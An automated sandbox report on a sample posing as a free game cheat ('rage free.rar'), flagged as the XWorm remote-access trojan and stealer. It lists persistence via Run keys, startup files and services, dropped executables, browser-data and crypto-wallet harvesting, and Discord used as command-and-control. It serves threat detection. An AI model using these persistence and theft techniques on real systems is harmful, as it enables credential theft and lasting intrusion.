Malware Analysis Report

2024-11-30 04:11

Sample ID 240408-a84lsabh56
Target rage free.rar
SHA256 b4da01818ad42712ce44298b148f94971ee4a2e0fff1b6f97f09955b9ba8c059
Tags
xworm persistence pyinstaller rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b4da01818ad42712ce44298b148f94971ee4a2e0fff1b6f97f09955b9ba8c059

Threat Level: Known bad

The file rage free.rar was found to be: Known bad.

Malicious Activity Summary

xworm persistence pyinstaller rat spyware stealer trojan upx

Xworm

Detect Xworm Payload

NirSoft WebBrowserPassView

Nirsoft

Downloads MZ/PE file

Sets service image path in registry

Executes dropped EXE

UPX packed file

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

Detects videocard installed

Modifies registry class

Uses Task Scheduler COM API

Runs net.exe

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Gathers system information

Enumerates processes with tasklist

NTFS ADS

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-08 00:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-08 00:53

Reported

2024-04-08 01:27

Platform

win10v2004-20231215-en

Max time kernel

1799s

Max time network

1798s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\rage free.rar"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lBmHlTePJveVGiHnIonWMPc\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lBmHlTePJveVGiHnIonWMPc" C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VPkrhDddTg\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\VPkrhDddTg" C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\rage free\Injector.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\injector.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\rage free\Injector.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\injector.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe C:\Users\Admin\AppData\Roaming\creal.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe C:\Users\Admin\AppData\Roaming\creal.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\rage free\Injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Desktop\rage free\Injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI42562\getPass.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI55522\getPass.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe N/A
N/A N/A C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\Downloads\vt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\creal.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windowshalper(legit) = "C:\\Users\\Admin\\AppData\\Roaming\\Windowshalper(legit).exe" C:\Users\Admin\AppData\Roaming\Nothere.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SoftwareDistribution\Download\qOTtu.exe C:\Users\Admin\AppData\Roaming\injector.exe N/A
File created C:\Windows\SoftwareDistribution\Download\q8q5y.exe C:\Users\Admin\AppData\Roaming\injector.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{95C05F79-8320-4FBB-9BCD-666A7DF3FCDB} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{12C6F3AF-6270-4AB8-BFB0-A6A5203BBF31} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\7-Zip\7zFM.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 101396.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nothere.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A C:\Windows\SoftwareDistribution\Download\qOTtu.exe N/A
N/A N/A C:\Windows\SoftwareDistribution\Download\q8q5y.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
